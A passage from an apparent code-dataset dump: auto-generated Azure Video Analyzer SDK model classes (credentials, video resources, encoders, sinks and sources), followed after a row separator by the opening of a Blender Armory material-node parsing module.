:ivar principal_id: The principal ID.
:vartype principal_id: str
"""
_validation = {
'client_id': {'readonly': True},
'principal_id': {'readonly': True},
}
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UserAssignedManagedIdentity, self).__init__(**kwargs)
self.client_id = None
self.principal_id = None
class UsernamePasswordCredentials(CredentialsBase):
"""Username and password credentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param username: Required. Username to be presented as part of the credentials.
:type username: str
:param password: Required. Password to be presented as part of the credentials. It is
recommended that this value is parameterized as a secret string in order to prevent this value
to be returned as part of the resource on API requests.
:type password: str
"""
_validation = {
'type': {'required': True},
'username': {'required': True},
'password': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsernamePasswordCredentials, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UsernamePasswordCredentials' # type: str
self.username = kwargs['username']
self.password = kwargs['password']
class VideoAnalyzer(TrackedResource):
"""The Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzer, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoAnalyzerCollection(msrest.serialization.Model):
"""A collection of VideoAnalyzer items.
:param value: A collection of VideoAnalyzer items.
:type value: list[~video_analyzer.models.VideoAnalyzer]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoAnalyzer]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class VideoAnalyzerIdentity(msrest.serialization.Model):
"""The managed identity for the Video Analyzer resource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The identity type.
:type type: str
:param user_assigned_identities: The User Assigned Managed Identities.
:type user_assigned_identities: dict[str, ~video_analyzer.models.UserAssignedManagedIdentity]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{UserAssignedManagedIdentity}'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerIdentity, self).__init__(**kwargs)
self.type = kwargs['type']
self.user_assigned_identities = kwargs.get('user_assigned_identities', None)
class VideoAnalyzerOperationStatus(msrest.serialization.Model):
"""Status of video analyzer operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerPrivateEndpointConnectionOperationStatus(msrest.serialization.Model):
"""Status of private endpoint connection operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerPrivateEndpointConnectionOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerUpdate(msrest.serialization.Model):
"""The update operation for a Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerUpdate, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoArchival(msrest.serialization.Model):
"""Video archival properties.
:param retention_period: Video retention period indicates the maximum age of the video archive
segments which are intended to be kept in storage. It must be provided in the ISO8601 duration
format in the granularity of days, up to a maximum of 10 years. For example, if this is set to
P30D (30 days), content older than 30 days will be periodically deleted. This value can be
updated at any time and the new desired retention period will be effective within 24 hours.
:type retention_period: str
"""
_attribute_map = {
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoArchival, self).__init__(**kwargs)
self.retention_period = kwargs.get('retention_period', None)
class VideoContentToken(msrest.serialization.Model):
""""Video content token grants access to the video content URLs.".
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The content token expiration date in ISO8601 format (eg.
2021-01-01T00:00:00Z).
:vartype expiration_date: ~datetime.datetime
:ivar token: The content token value to be added to the video content URL as the value for the
"token" query string parameter. The token is specific to a single video.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoContentToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class VideoContentUrls(msrest.serialization.Model):
"""Set of URLs to the video content.
:param download_url: Video file download URL. This URL can be used in conjunction with the
video content authorization token to download the video MP4 file. The resulting MP4 file can be
played on any standard media player. It is available when the video type is 'file' and video
file is available for consumption.
:type download_url: str
:param archive_base_url: Video archive streaming base URL. The archived content can be
automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be
used in conjunction with the video content authorization token on any compatible DASH or HLS
players by appending the following to the base URL:
.. code-block::
- HLSv4: /manifest(format=m3u8-aapl).m3u8
- HLS CMAF: /manifest(format=m3u8-cmaf)
- DASH CMAF: /manifest(format=mpd-time-cmaf)
Moreover, an ongoing video recording can be played in "live mode" with latencies which are
approximately double of the chosen video segment length. It is available when the video type is
'archive' and video archiving is enabled.
:type archive_base_url: str
:param rtsp_tunnel_url: Video low-latency streaming URL. The live content can be automatically
played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in
conjunction with the video content authorization token to expose a WebSocket tunneled RTSP
stream. It is available when the video type is 'archive' and a live, low-latency feed is
available from the source.
:type rtsp_tunnel_url: str
:param preview_image_urls: Video preview image URLs. These URLs can be used in conjunction with
the video content authorization token to download the most recent still image from the video
archive in different resolutions. They are available when the video type is 'archive' and
preview images are enabled.
:type preview_image_urls: ~video_analyzer.models.VideoPreviewImageUrls
"""
_attribute_map = {
'download_url': {'key': 'downloadUrl', 'type': 'str'},
'archive_base_url': {'key': 'archiveBaseUrl', 'type': 'str'},
'rtsp_tunnel_url': {'key': 'rtspTunnelUrl', 'type': 'str'},
'preview_image_urls': {'key': 'previewImageUrls', 'type': 'VideoPreviewImageUrls'},
}
def __init__(
self,
**kwargs
):
super(VideoContentUrls, self).__init__(**kwargs)
self.download_url = kwargs.get('download_url', None)
self.archive_base_url = kwargs.get('archive_base_url', None)
self.rtsp_tunnel_url = kwargs.get('rtsp_tunnel_url', None)
self.preview_image_urls = kwargs.get('preview_image_urls', None)
class VideoCreationProperties(msrest.serialization.Model):
"""Optional properties to be used in case a new video resource needs to be created on the service. These will not take effect if the video already exists.
:param title: Optional title provided by the user. Value can be up to 256 characters long.
:type title: str
:param description: Optional description provided by the user. Value can be up to 2048
characters long.
:type description: str
:param segment_length: Segment length indicates the length of individual content files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary between 30 seconds to
5 minutes, in 30 seconds increments. Changing this value after the initial call to create the
video resource can lead to errors when uploading content to the archive. Default value is 30
seconds. This property is only allowed for topologies where "kind" is set to "live".
:type segment_length: str
:param retention_period: Video retention period indicates how long the video is kept in
storage. Value must be specified in ISO8601 duration format (i.e. "P1D" equals 1 day) and can
vary between 1 day to 10 years, in 1 day increments. When absent (null), all video content is
retained indefinitely. This property is only allowed for topologies where "kind" is set to
"live".
:type retention_period: str
"""
_attribute_map = {
'title': {'key': 'title', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'segment_length': {'key': 'segmentLength', 'type': 'str'},
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoCreationProperties, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.segment_length = kwargs.get('segment_length', None)
self.retention_period = kwargs.get('retention_period', None)
class VideoEncoderBase(msrest.serialization.Model):
"""Base type for all video encoding presets, which define the recipe or instructions on how the input video should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoEncoderH264.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
be encoded. If omitted, encoder sets it automatically to try and match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoEncoderH264': 'VideoEncoderH264'}
}
def __init__(
self,
**kwargs
):
super(VideoEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.frame_rate = kwargs.get('frame_rate', None)
self.scale = kwargs.get('scale', None)
class VideoEncoderH264(VideoEncoderBase):
"""A custom preset for encoding video with the H.264 (AVC) codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
be encoded. If omitted, encoder sets it automatically to try and match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
def __init__(
self,
**kwargs
):
super(VideoEncoderH264, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoEncoderH264' # type: str
class VideoEntity(ProxyResource):
"""Represents a video resource within Azure Video Analyzer. Videos can be ingested from RTSP cameras through live pipelines or can be created by exporting sequences from existing captured video through a pipeline job. Videos ingested through live pipelines can be streamed through Azure Video Analyzer Player Widget or compatible players. Exported videos can be downloaded as MP4 files.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param title: Optional video title provided by the user. Value can be up to 256 characters
long.
:type title: str
:param description: Optional video description provided by the user. Value can be up to 2048
characters long.
:type description: str
:ivar type_properties_type: Video content type. Different content types are suitable for
different applications and scenarios. Possible values include: "Archive", "File".
:vartype type_properties_type: str or ~video_analyzer.models.VideoType
:ivar flags: Video flags contain information about the available video actions and its dynamic
properties based on the current video state.
:vartype flags: ~video_analyzer.models.VideoFlags
:ivar content_urls: Set of URLs to the video content.
:vartype content_urls: ~video_analyzer.models.VideoContentUrls
:param media_info: Contains information about the video and audio content.
:type media_info: ~video_analyzer.models.VideoMediaInfo
:param archival: Video archival properties.
:type archival: ~video_analyzer.models.VideoArchival
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'type_properties_type': {'readonly': True},
'flags': {'readonly': True},
'content_urls': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'title': {'key': 'properties.title', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'type_properties_type': {'key': 'properties.type', 'type': 'str'},
'flags': {'key': 'properties.flags', 'type': 'VideoFlags'},
'content_urls': {'key': 'properties.contentUrls', 'type': 'VideoContentUrls'},
'media_info': {'key': 'properties.mediaInfo', 'type': 'VideoMediaInfo'},
'archival': {'key': 'properties.archival', 'type': 'VideoArchival'},
}
def __init__(
self,
**kwargs
):
super(VideoEntity, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.type_properties_type = None
self.flags = None
self.content_urls = None
self.media_info = kwargs.get('media_info', None)
self.archival = kwargs.get('archival', None)
class VideoEntityCollection(msrest.serialization.Model):
"""A collection of VideoEntity items.
:param value: A collection of VideoEntity items.
:type value: list[~video_analyzer.models.VideoEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class VideoFlags(msrest.serialization.Model):
"""Video flags contain information about the available video actions and its dynamic properties based on the current video state.
All required parameters must be populated in order to send to Azure.
:param can_stream: Required. Value indicating whether or not the video can be streamed. Only
"archive" type videos can be streamed.
:type can_stream: bool
:param has_data: Required. Value indicating whether or not there has ever been data recorded or
uploaded into the video. Newly created videos have this value set to false.
:type has_data: bool
:param is_in_use: Required. Value indicating whether or not the video is currently being
referenced be an active pipeline. The fact that is being referenced, doesn't necessarily
indicate that data is being received. For example, video recording may be gated on events or
camera may not be accessible at the time.
:type is_in_use: bool
"""
_validation = {
'can_stream': {'required': True},
'has_data': {'required': True},
'is_in_use': {'required': True},
}
_attribute_map = {
'can_stream': {'key': 'canStream', 'type': 'bool'},
'has_data': {'key': 'hasData', 'type': 'bool'},
'is_in_use': {'key': 'isInUse', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(VideoFlags, self).__init__(**kwargs)
self.can_stream = kwargs['can_stream']
self.has_data = kwargs['has_data']
self.is_in_use = kwargs['is_in_use']
class VideoMediaInfo(msrest.serialization.Model):
"""Contains information about the video and audio content.
:param segment_length: Video segment length indicates the length of individual video files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary between 30 seconds to
5 minutes, in 30 seconds increments.
:type segment_length: str
"""
_attribute_map = {
'segment_length': {'key': 'segmentLength', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoMediaInfo, self).__init__(**kwargs)
self.segment_length = kwargs.get('segment_length', None)
class VideoPreviewImageUrls(msrest.serialization.Model):
"""Video preview image URLs. These URLs can be used in conjunction with the video content authorization token to download the most recent still image from the video archive in different resolutions. They are available when the video type is 'archive' and preview images are enabled.
:param small: Low resolution preview image URL.
:type small: str
:param medium: Medium resolution preview image URL.
:type medium: str
:param large: High resolution preview image URL.
:type large: str
"""
_attribute_map = {
'small': {'key': 'small', 'type': 'str'},
'medium': {'key': 'medium', 'type': 'str'},
'large': {'key': 'large', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPreviewImageUrls, self).__init__(**kwargs)
self.small = kwargs.get('small', None)
self.medium = kwargs.get('medium', None)
self.large = kwargs.get('large', None)
class VideoPublishingOptions(msrest.serialization.Model):
"""Optional flags used to change how video is published. These are only allowed for topologies where "kind" is set to "live".
:param disable_archive: When set to 'true' content will not be archived or recorded. This is
used, for example, when the topology is used only for low latency video streaming. Default is
'false'. If set to 'true', then "disableRtspPublishing" must be set to 'false'.
:type disable_archive: str
:param disable_rtsp_publishing: When set to 'true' the RTSP playback URL will not be published,
disabling low latency streaming. This is used, for example, when the topology is used only for
archiving content. Default is 'false'. If set to 'true', then "disableArchive" must be set to
'false'.
:type disable_rtsp_publishing: str
"""
_attribute_map = {
'disable_archive': {'key': 'disableArchive', 'type': 'str'},
'disable_rtsp_publishing': {'key': 'disableRtspPublishing', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPublishingOptions, self).__init__(**kwargs)
self.disable_archive = kwargs.get('disable_archive', None)
self.disable_rtsp_publishing = kwargs.get('disable_rtsp_publishing', None)
class VideoScale(msrest.serialization.Model):
"""The video scaling information.
:param height: The desired output video height.
:type height: str
:param width: The desired output video width.
:type width: str
:param mode: Describes the video scaling mode to be applied. Default mode is 'Pad'. If the mode
is 'Pad' or 'Stretch' then both width and height must be specified. Else if the mode is
'PreserveAspectRatio' then only one of width or height need be provided. Possible values
include: "Pad", "PreserveAspectRatio", "Stretch".
:type mode: str or ~video_analyzer.models.VideoScaleMode
"""
_attribute_map = {
'height': {'key': 'height', 'type': 'str'},
'width': {'key': 'width', 'type': 'str'},
'mode': {'key': 'mode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoScale, self).__init__(**kwargs)
self.height = kwargs.get('height', None)
self.width = kwargs.get('width', None)
self.mode = kwargs.get('mode', None)
class VideoSequenceAbsoluteTimeMarkers(TimeSequenceBase):
"""A sequence of absolute datetime ranges as a string. The datetime values should follow IS08601, and the sum of the ranges should add up to 24 hours or less. Currently, there can be only one range specified in the sequence.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param ranges: Required. The sequence of datetime ranges. Example: '[["2021-10-05T03:30:00Z",
"2021-10-05T03:40:00Z"]]'.
:type ranges: str
"""
_validation = {
'type': {'required': True},
'ranges': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'ranges': {'key': 'ranges', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoSequenceAbsoluteTimeMarkers, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers' # type: str
self.ranges = kwargs['ranges']
class VideoSink(SinkNodeBase):
"""Video sink in a live topology allows for video and audio to be captured, optionally archived, and published via a video resource. If archiving is enabled, this results in a video of type 'archive'. If used in a batch topology, this allows for video and audio to be stored as a file, and published via a video resource of type 'file'.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param video_name: Required. Name of a new or existing video resource used to capture and
publish content. Note: if downstream of RTSP source, and if disableArchive is set to true, then
no content is archived.
:type video_name: str
:param video_creation_properties: Optional video properties to be used in case a new video
resource needs to be created on the service.
:type video_creation_properties: ~video_analyzer.models.VideoCreationProperties
:param video_publishing_options: Options to change how the video sink publishes content via the
video resource. This property is only allowed for topologies where "kind" is set to "live".
:type video_publishing_options: ~video_analyzer.models.VideoPublishingOptions
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'video_name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'video_name': {'key': 'videoName', 'type': 'str'},
'video_creation_properties': {'key': 'videoCreationProperties', 'type': 'VideoCreationProperties'},
'video_publishing_options': {'key': 'videoPublishingOptions', 'type': 'VideoPublishingOptions'},
}
def __init__(
self,
**kwargs
):
super(VideoSink, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSink' # type: str
self.video_name = kwargs['video_name']
self.video_creation_properties = kwargs.get('video_creation_properties', None)
self.video_publishing_options = kwargs.get('video_publishing_options', None)
class VideoSource(SourceNodeBase):
"""Video source allows for content from a Video Analyzer video resource to be ingested into a pipeline. Currently supported only with batch pipelines.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param video_name: Required. Name of the Video Analyzer video resource to be used as the
source.
:type video_name: str
:param time_sequences: Required. Describes a sequence of datetime ranges. The video source only
picks up recorded media within these ranges.
:type time_sequences: ~video_analyzer.models.TimeSequenceBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'video_name': {'required': True},
'time_sequences': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'video_name': {'key': 'videoName', 'type': 'str'},
'time_sequences': {'key': 'timeSequences', 'type': 'TimeSequenceBase'},
}
def __init__(
self,
**kwargs
):
super(VideoSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSource' # type: str
self.video_name = kwargs['video_name']
self.time_sequences = kwargs['time_sequences']
| [] |
philipmduarte/armory | blender/arm/material/cycles.py | 675211c66a1e49147226ccb472a6f5dc87b7db02 | #
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
if output_node != None:
parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)
def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
global parsed # Compute nodes only once
global parents
global normal_parsed
global curshader # Active shader - frag for surface / tese for displacement
global con
global vert
global frag
global geom
global tesc
global tese
global parse_surface
